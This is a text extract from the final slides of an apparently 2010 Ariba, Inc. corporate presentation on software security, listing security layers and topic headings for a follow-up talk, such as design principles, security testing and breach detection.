Security Technological Security Application Security Operating System Security Network Security Policies and Procedures © 2010 Ariba, Inc. All rights reserved. The contents of this document are confidential and proprietary information of Ariba, Inc.
42.
Next Presentation Brief discussion
on 360 degree security Fundamental Security Concepts Security Design Principles Best Practices and Solutions Testing for Security (Being the hacker) Security breach detection and mitigation Tools Ariba Buyer security assessment © 2010 Ariba, Inc. All rights reserved. The contents of this document are confidential and proprietary information of Ariba, Inc.
43.
© 2010 Ariba,
Inc. All rights reserved. The contents of this document are confidential and proprietary information of Ariba, Inc.
44.
© 2010 Ariba,
Inc. All rights reserved. The contents of this document are confidential and proprietary information of Ariba, Inc.
Télécharger maintenant